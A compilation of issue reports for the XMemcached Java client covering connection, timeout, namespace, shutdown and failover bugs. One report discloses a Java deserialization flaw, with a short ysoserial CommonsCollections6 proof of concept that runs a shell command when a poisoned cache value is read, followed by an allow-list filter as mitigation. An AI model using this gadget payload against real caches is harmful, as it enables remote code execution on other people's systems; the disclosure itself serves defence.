        <property name="connectionPoolSize" value="2"/>
        <property name="commandFactory">
            <bean class="net.rubyeye.xmemcached.command.TextCommandFactory"/>
        </property>
        <property name="sessionLocator">
            <bean class="net.rubyeye.xmemcached.impl.KetamaMemcachedSessionLocator"/>
        </property>
        <property name="transcoder">
            <bean class="net.rubyeye.xmemcached.transcoders.SerializingTranscoder"/>
        </property>
    </bean>
    <bean name="memcachedClient" factory-bean="memcachedClientBuilder"
          factory-method="build" destroy-method="shutdown"/>

I suspect that in some situation the session is never re-created.
Restarting the application made it work normally again for now.

Different namespaces may get the same timestamp

XMemcachedClient.getNamespace uses a timestamp as the namespace identifier. However, the timestamp may be identical when servers start against a clean memcached.
This has happened on our production servers, causing xmemcached to get wrong values from another namespace.
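If two servers can start within the same millisecond against a clean cache, a bare timestamp is not unique. A hypothetical identifier generator (not xmemcached's API) that mixes in random bits:

```java
import java.security.SecureRandom;

// Hypothetical namespace-id generator: combine the timestamp with random
// bits so two servers starting in the same millisecond still get distinct
// identifiers.
public class NamespaceId {
    private static final SecureRandom RANDOM = new SecureRandom();

    public static String next() {
        return Long.toHexString(System.currentTimeMillis())
                + "-" + Long.toHexString(RANDOM.nextLong());
    }
}
```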

[security] XMemcached deserialization vulnerability

XMemcached supports a series of transcoders, and they all have a decode method for retrieving different types of cached data. But SerializingTranscoder uses the deserialize method, and deserialize in BaseSerializingTranscoder uses ObjectInputStream#readObject. So if the cached data is a malicious object, arbitrary Java code can be executed when the client attempts to get the value.
PoC:

import ysoserial.payloads.CommonsCollections6;
....//host, user, password define
Object evilObject = new CommonsCollections6().getObject("touch /tmp/vultest");
MemcachedClient cache = null;
cache = new MemcachedClient(new ConnectionFactoryBuilder().setProtocol(Protocol.BINARY).setAuthDescriptor(ad).build(),
                                AddrUtil.getAddresses(host + ":" + port));
OperationFuture<Boolean> future = cache.set("testKey", expireTime, evilObject);
future.get();
cache.get("testKey");

In many cloud service scenarios, providers offer managed NoSQL services online; if they use SerializingTranscoder, it can be dangerous.
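Independent of any fix in the library, JDK 9+ deserialization filters can mitigate this class of attack at the application level. A sketch (hypothetical helper, not part of xmemcached) that allow-lists the expected classes and rejects everything else, including gadget chains like the CommonsCollections payload above:

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.UncheckedIOException;

// Allow-list deserialization (JDK 9+): only the named classes may be
// deserialized; anything else is rejected with InvalidClassException before
// any gadget code can run.
public class SafeDeserializer {
    public static byte[] serialize(Object o) {
        try {
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            new ObjectOutputStream(bos).writeObject(o);
            return bos.toByteArray();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    // Returns null if the stream is rejected by the filter or malformed.
    public static Object deserialize(byte[] bytes) {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            in.setObjectInputFilter(ObjectInputFilter.Config.createFilter(
                    "java.lang.String;java.lang.Number;java.lang.Integer;!*"));
            return in.readObject();
        } catch (IOException | ClassNotFoundException e) {
            return null; // rejected (InvalidClassException) or corrupt
        }
    }
}
```

A custom Transcoder could apply the same filter inside its decode path, so evil cache entries are rejected rather than executed.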

Heal-Session-Thread stops if UnresolvedAddressException occurs

If a network issue occurs and hostnames cannot be resolved, the SessionMonitor throws an exception (in rescheduleConnectRequest, at the log line below) and the thread stops.
After that, the XMemcachedClient becomes unusable and never reconnects.

Exception in thread "Heal-Session-Thread" java.lang.NullPointerException at net.rubyeye.xmemcached.impl.MemcachedConnector$SessionMonitor.rescheduleConnectRequest(MemcachedConnector.java:166) at net.rubyeye.xmemcached.impl.MemcachedConnector$SessionMonitor.run(MemcachedConnector.java:152)
After earlier exception
[13:43:40,544][] [ERROR]xmemcached.impl.MemcachedConnector$SessionMonitor:151 - SessionMonitor connect error java.nio.channels.UnresolvedAddressException at sun.nio.ch.Net.checkAddress(Net.java:123) at sun.nio.ch.SocketChannelImpl.connect(SocketChannelImpl.java:622) at net.rubyeye.xmemcached.impl.MemcachedConnector.connect(MemcachedConnector.java:468) at net.rubyeye.xmemcached.impl.MemcachedConnector$SessionMonitor.run(MemcachedConnector.java:118)

The code in question is:
log.error("Reconnect to " + address.getAddress().getHostAddress() + ":" + address.getPort() + " fail");
It fails because address.getAddress() returns null when the host is not resolvable.

java.util.concurrent.TimeoutException even though the memcached server is almost unloaded

I observe sometimes such exceptions:

07:58:26,346 ERROR [stderr] (default task-35) java.util.concurrent.TimeoutException: Timed out(5000 milliseconds) waiting for operation while connected to xxx:11211
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.latchWait(XMemcachedClient.java:2572)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:644)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1085)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1043)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1054)
07:58:26,347 ERROR [stderr] (default task-35) 	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1076)

This is strange, because the server has CPU usage below 1%. So I wonder if I do something wrong with the instantiation of the xmemcached client. I use it in a Java EE environment. I created a @Singleton which builds the client in @PostConstruct; since the xmemcached client should be thread safe, I also annotated the singleton with @ConcurrencyManagement(ConcurrencyManagementType.BEAN). So the whole code looks like:

@Singleton
@Startup
@ConcurrencyManagement(ConcurrencyManagementType.BEAN)
public class CacheService
{

	private MemcachedClient memcachedClient;

	@PostConstruct
	private void connect()
	{
		try {
			MemcachedClientBuilder builder = new XMemcachedClientBuilder(AddrUtil.getAddresses(host));
			builder.setCommandFactory(new BinaryCommandFactory());
			memcachedClient = builder.build();
		} catch (IOException e) {
			// @PostConstruct methods must not throw checked exceptions
			throw new IllegalStateException("Could not build memcached client", e);
		}
	}

	@SuppressWarnings("unchecked")
	public <T> T cacheGet(String key) throws TimeoutException, InterruptedException, MemcachedException
	{
		return (T) memcachedClient.get(key);
	}

	...
}

Then I inject this singleton into my service classes (@Stateless beans) where I simply call cacheService.cacheGet(...)

Is there something wrong with this?

how to make a set of memcached servers have the same consistent hash?

For example, I have a set of servers that includes many Tomcat servers and memcached servers. I want to give every Tomcat server the same list of memcached server addresses and use consistent hashing to distribute keys across those servers with xmemcached.

The question is: how can the same memcached server get the same hash position on different Tomcat servers?
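The property being asked about can be demonstrated with a self-contained ketama-style ring (a simplified sketch, not XMemcached's internal implementation): as long as every client builds the ring from the same server list with the same hash function, a given key maps to the same server everywhere.

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

public class ConsistentHashRing {
    // Each server occupies many points ("replicas") on the ring; a key is
    // served by the first server point at or after the key's own hash,
    // wrapping around at the end of the ring.
    private final TreeMap<Long, String> ring = new TreeMap<>();

    public ConsistentHashRing(List<String> servers, int replicas) {
        for (String server : servers) {
            for (int i = 0; i < replicas; i++) {
                ring.put(hash(server + "#" + i), server);
            }
        }
    }

    public String serverFor(String key) {
        Map.Entry<Long, String> e = ring.ceilingEntry(hash(key));
        return e != null ? e.getValue() : ring.firstEntry().getValue();
    }

    // First 8 bytes of the MD5 digest, packed into a long. The ring is
    // fully determined by the server list and this hash, so independent
    // clients agree without any coordination.
    private static long hash(String s) {
        try {
            byte[] d = MessageDigest.getInstance("MD5")
                    .digest(s.getBytes(StandardCharsets.UTF_8));
            long h = 0;
            for (int i = 0; i < 8; i++) {
                h = (h << 8) | (d[i] & 0xff);
            }
            return h;
        } catch (NoSuchAlgorithmException e) {
            throw new AssertionError("MD5 unavailable", e);
        }
    }
}
```

In XMemcached itself, enabling consistent hashing is a builder call: builder.setSessionLocator(new KetamaMemcachedSessionLocator()). Every Tomcat instance configured with the same address list will then agree on key placement.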

Hi, while using the client we are seeing a lot of net.rubyeye.xmemcached.exception.MemcachedException: There is no available connection at this moment

net.rubyeye.xmemcached.impl.MemcachedConnector.send(MemcachedConnector.java:501),
net.rubyeye.xmemcached.XMemcachedClient.sendCommand(XMemcachedClient.java:327),
net.rubyeye.xmemcached.XMemcachedClient.sendStoreCommand(XMemcachedClient.java:2534),
net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1374),
net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1432),
net.rubyeye.xmemcached.XMemcachedClient.set(XMemcachedClient.java:1419),
com.tencent.mta.statistics.common.service.MemcachedCommand.invoke(MemcachedCommand.java:36),
com.tencent.mta.statistics.common.service.MemcachedService.invoke(MemcachedService.java:58),
com.tencent.mta.statistics.common.service.MemcachedService.set(MemcachedService.java:81),
com.tencent.mta.statistics.guid.GuidBolt.execute(GuidBolt.java:137),
backtype.storm.topology.BasicBoltExecutor.execute(BasicBoltExecutor.java:52),
com.tencent.jstorm.daemon.executor.bolt.BoltExecutor.tupleActionFn(BoltExecutor.java:190),
com.tencent.jstorm.daemon.executor.bolt.BoltExecutor.onEvent(BoltExecutor.java:156),
backtype.storm.utils.DisruptorQueue.consumeBatchToCursor(DisruptorQueue.java:143),
backtype.storm.utils.DisruptorQueue.consumeBatchWhenAvailable(DisruptorQueue.java:114),
com.tencent.jstorm.daemon.executor.bolt.BoltExecutor.run(BoltExecutor.java:128),
com.tencent.jstorm.utils.thread.AsyncLoopRunnable.run(AsyncLoopRunnable.java:51),
java.lang.Thread.run(Thread.java:745)

One thread's stack is shown above.

We create several memcached clients in several unrelated threads within a single process, use each client serially inside its own thread, and never shut it down in between. Our keys and values are only a few dozen bytes each, though some keys may repeat many times.

We use the completely default configuration. What might be the problem?

Memory leak after shutdown

Shutting down the client doesn't free all the memory allocated.
When used in a WAR, multiple sequential redeployments trigger an OutOfMemoryError in PermGen.

Using YourKit, I found that the only remaining reference was held through the registered shutdown hooks.

To make the shutdown process cleaner, these hooks should be unregistered.
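A sketch of the cleanup being requested, with illustrative names (not XMemcached's actual fields): keep a reference to the registered hook thread so an explicit shutdown() can unregister it, allowing the webapp classloader to be collected on redeploy.

```java
public class HookOwner {
    private Thread shutdownHook;

    public synchronized void start() {
        shutdownHook = new Thread(this::releaseResources);
        Runtime.getRuntime().addShutdownHook(shutdownHook);
    }

    public synchronized void shutdown() {
        releaseResources();
        if (shutdownHook != null) {
            // Without this call, the JVM keeps a strong reference to the
            // hook (and transitively to the client and its classloader)
            // until process exit.
            Runtime.getRuntime().removeShutdownHook(shutdownHook);
            shutdownHook = null;
        }
    }

    public synchronized boolean hookRegistered() {
        return shutdownHook != null;
    }

    private void releaseResources() {
        // close sessions, stop reactor threads, free buffers, etc.
    }
}
```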

MemcachedException is always thrown when using incr

As the title says: MemcachedException is always thrown whenever I use incr to increment a counter.

This is the code of the Cache utility class:

public static long incr(String key){
        LOG.info("INCR increment: " + key);
        try {
            return client.incr(key, 1, 1);
        } catch (TimeoutException e){
            LOG.error("[" + key + "] memcache incr timed out");
        } catch (InterruptedException e){
            LOG.error("[" + key + "] memcache incr was interrupted");
        } catch (MemcachedException e){
            LOG.error("[" + key + "] memcache incr internal error");
        }
        return 0;
    }

And this is how it is used:

Cache.incr(key);

This is all very ordinary code, but MemcachedException keeps being thrown. What could the causes be?

getMulti0 bug?

When I used a multi-get operation under a namespace, as in the following test, I got an unexpected result. For example, assuming I have already set two key-value pairs <K1, V1> and <K2, V2> in a namespace NS, when I use get to fetch the values, I get a NULL result.

    String value = "bar";
    String value2 = "bar2"; 

    LOG.info("test namespace now.");
    client.beginWithNamespace("ns");
    Assert.assertTrue(client.set("foo3", 1024, value));
    Assert.assertTrue(client.set("foo4", 1024, value2));
    client.endWithNamespace();

    list.clear();
    list.add("foo3");
    list.add("foo4");
    Map<String, String> simpleResults;
    client.beginWithNamespace("ns");
    simpleResults = client.get(list);
    LOG.info("results with ns: " + simpleResults);
    client.endWithNamespace();

The cause of this issue seems to be a bug in the class net.rubyeye.xmemcached.XMemcachedClient (line #1220).
If users don't set sanitizeKeys to true, the namespace prefix is not prepended to each key, which causes the above issue.
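Until a fix lands, one hypothetical client-side workaround is to prepend the namespace to every key before the multi-get and strip it from the returned map. The "ns:key" format below is purely illustrative; XMemcached's internal namespace key encoding is different.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

public class NamespaceKeys {
    // Prefix every key with the namespace before calling get(list).
    public static List<String> withPrefix(String ns, List<String> keys) {
        List<String> out = new ArrayList<>(keys.size());
        for (String key : keys) {
            out.add(ns + ":" + key);
        }
        return out;
    }

    // Strip the namespace back off the keys of the result map.
    public static <V> Map<String, V> stripPrefix(String ns, Map<String, V> raw) {
        String prefix = ns + ":";
        Map<String, V> out = new HashMap<>();
        for (Map.Entry<String, V> e : raw.entrySet()) {
            String key = e.getKey();
            out.put(key.startsWith(prefix) ? key.substring(prefix.length()) : key,
                    e.getValue());
        }
        return out;
    }
}
```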

need a builder for AWSElasticCacheClient?

Hello!

Thank you for providing support for node autodiscovery in AWS ElastiCache. I just tested it out and it looks like it's working so far. If our testing continues to go well, it means we won't have to run twemproxy, which is nice!

In my testing I ran into what might be a configuration/building issue, but I'm new to xmemcached, so perhaps I'm not using it right. Basically, I want to be able to set configuration values such as setConnectionPoolSize. In our existing code in master, we use the builder pattern given to us via XMemcachedClientBuilder, but AWSElasticCacheClient doesn't have an associated builder.

So I instantiated it manually and tried to call setConnectionPoolSize, but that gives me an IllegalStateException, as the constructor for AWSElasticCacheClient starts the connection.

I also want to set the session idle timeout: builder.getConfiguration().setSessionIdleTimeout(15000);

Do you have any suggestions for how I can make this work? Or do we need a new version that either gives us a builder for AWSElasticCacheClient or, perhaps, allows us to not start the AWSElasticCacheClient at instantiation time but instead manually?

Thanks again!

MemcachedClient.get sometimes returns null, even though the key actually has a correct value

MemcachedClient.get returns the correct value most of the time, but sometimes returns null. How can I fix this?
I use Spring Boot.

My Configuration

@Configuration
public class UserMemcacheConfig extends BaseConfig{

    @Value("${memcache.user.host}")
    private String host;
    @Value("${memcache.user.port}")
    private int port;
    @Value("${memcache.user.poolSize}")
    private int poolSize;
    @Value("${memcache.user.connTimeout}")
    private long connTimeout;
    @Value("${memcache.user.opTimeout}")
    private long opTimeout;

    @Bean(name="userMemcacheClient")
    public MemcachedClient getMemcacheClient() throws IOException {
        return this.generateMemcacheClient(host, port, poolSize, connTimeout, opTimeout);
    }
}

My yml properties

memcache:
  default:
    host: 127.0.0.1
    port: 11211
    poolSize: 30
    connTimeout: 1000
    opTimeout: 500
  user:
    host: 10.0.0.248
    port: 9101
    poolSize: 30
    connTimeout: 1000
    opTimeout: 500
  note:
    host: 127.0.0.1
    port: 11211
    poolSize: 30
    connTimeout: 1000
    opTimeout: 500
@Service
public class UserServiceImpl implements UserService{

    @Autowired
    private UserRepository userRepository;

    @Resource
    private MemcachedClient userMemcacheClient;

    @Override
    public User getById(String userId){
        User user = userRepository.findOne(new ObjectId(userId));
        return user;
    }

    @Override
    public String getUserIdBySid(String sid) {
        System.out.println(sid);
        if(StringUtils.isEmpty(sid)) {
            return null;
        }
        String key = String.format(MemcacheKeys.userIdBySid, sid);
        try {
            System.out.println(key);
            String userId = userMemcacheClient.get(key);
            System.out.println(userId);
            if(StringUtils.isEmpty(userId)){
                User user = userRepository.findBySession(sid);
                if(user != null){
                    userId = user.getId().toString();
                    userMemcacheClient.set(key, 100000, userId);
                }
            }
            return userId;
        } catch (InterruptedException e1){
            System.out.println("InterruptedException: " + e1.getMessage());
        } catch (MemcachedException e2){
            System.out.println("MemcachedException: " + e2.getMessage());
        }catch (TimeoutException e3){
            System.out.println("TimeoutException: " + e3.getMessage());
        }
        return null;
    }

}

I call getUserIdBySid with the same sid, but it sometimes returns null.

Do not collapse multiple servers when they resolve to the same IP

When I start XMemcached with multiple server strings that point to the same IP, XMemcached will create just a single session.

For example if I have DNS-1 pointing to server-1 and DNS-2 also pointing to server-1 XMemcached will create one session to server-1. If I later point DNS-2 to server-2 and restart server-1 to bump off the connection XMemcached will only heal the session to server-1 but not create one to server-2.

The reason this is important is flexibility. I need to be able to reconfigure servers without having to change the client configuration or restart the client.

ConfigurationPoller is not stopped when you call net.rubyeye.xmemcached.aws.AWSElasticCacheClient#shutdown

Hello,

We have been using the xmemcached client for some time in production and it seems to be working pretty well. We recently discovered that calling shutdown on net.rubyeye.xmemcached.aws.AWSElasticCacheClient doesn't actually stop the underlying net.rubyeye.xmemcached.aws.ConfigurationPoller's ThreadPoolExecutor. Looking through the code, there seem to be a few different ways to approach it:

  1. Remove final from net.rubyeye.xmemcached.XMemcachedClient#shutdown, override it in net.rubyeye.xmemcached.aws.AWSElasticCacheClient, and call configPoller.shutdown() there. But since I don't fully understand the design decision for making it final, I am not sure whether that's a good idea.
  2. Another way would be to add the following check at the top of net.rubyeye.xmemcached.aws.ConfigurationPoller#run:
	public void run() {
		if (client.isShutdown()) {
			stop();
			return;
		}
		// ... existing polling logic ...
	}

Either one will do the trick, and I am happy to make the change and open a PR if you like.

Thanks
Manish

Problem when a memcached server changes IP address

We have to configure our client with failureMode=true, and we get errors like this when a memcached server goes down and comes back with a different IP:

net.rubyeye.xmemcached.exception.MemcachedException: Session(192.168.1.41:11211) has been closed
	at net.rubyeye.xmemcached.impl.MemcachedConnector.send(MemcachedConnector.java:512)
	at net.rubyeye.xmemcached.XMemcachedClient.sendCommand(XMemcachedClient.java:317)
	at net.rubyeye.xmemcached.XMemcachedClient.fetch0(XMemcachedClient.java:644)
	at net.rubyeye.xmemcached.XMemcachedClient.get0(XMemcachedClient.java:1085)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1043)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1054)
	at net.rubyeye.xmemcached.XMemcachedClient.get(XMemcachedClient.java:1076)

The old IP was 192.168.1.41 and the new one is 192.168.1.44. When the server recovers with the new IP we can see logs like:

com.google.code.yanf4j.core.impl.AbstractController:? Add a session: 192.168.1.44:11211

However, the client is still using sessions with the old IP that are closed.

I have been debugging a bit and found that the class net.rubyeye.xmemcached.impl.MemcachedConnector has an attribute called sessionMap that contains sessions for both the old and the new IP, because the new sessions do not replace the old ones; all of those sessions are then passed to the session locator in the method updateSessions(). I think the session locator should receive only the sessions with the new IP.

Please could you take a look?

xmemcached load balancing question

Does xmemcached support load balancing? My data volume is fairly large, and I have several machines running as write queues. Can xmemcached balance writes across the different machines?

Help needed: the build method takes a very long time on the client's first connection

Every time the memcache client establishes its first connection, the XMemcachedClientBuilder.build() call takes about 5 seconds. Could you help me find the cause? Is some configuration setting wrong?

Execution log:
2018-03-07 10:49:50,770 INFO [http-nio-8080-exec-1] net.rubyeye.xmemcached.XMemcachedClient.buildConnector(XMemcachedClient.java:729) XMemcachedClient is using Text protocol
2018-03-07 10:49:55,952 INFO [http-nio-8080-exec-1] com.google.code.yanf4j.nio.impl.SelectorManager.(SelectorManager.java:37) Creating 8 reactors...

Shutdownhook in AbstractController can not be disabled

So, you can disable the shutdown hook in XMemcachedClient, but there is still the one in AbstractController, which is not configurable and will always fire, closing the client's underlying sessions and causing exceptions if you try to use the client during shutdown. I think it should honor the same "xmemcached.shutdown.hook.enable" property as the client.

TextCommandFactory should not be declared final

The other (Binary, Kestrel) implementations of CommandFactory are not final.

I am trying to extend the CommandFactory implementations to annotate the constructors with @JsonCreator so they can easily be created and set from a YAML config file.

Failover mode cannot be initialized

Hi!

In 2.4.0, when trying to use failure mode (builder.setFailureMode(true)) and specifying two memcached instances comma-separated for the builder, the builder.build() call fails with the following error:

java.lang.ClassCastException: net.rubyeye.xmemcached.impl.ClosedMemcachedTCPSession cannot be cast to net.rubyeye.xmemcached.networking.MemcachedSession
	at net.rubyeye.xmemcached.impl.MemcachedConnector.addSession(MemcachedConnector.java:227)
	at net.rubyeye.xmemcached.XMemcachedClient.connect(XMemcachedClient.java:621)
	at net.rubyeye.xmemcached.XMemcachedClient.<init>(XMemcachedClient.java:880)
	at net.rubyeye.xmemcached.XMemcachedClientBuilder.build(XMemcachedClientBuilder.java:339)
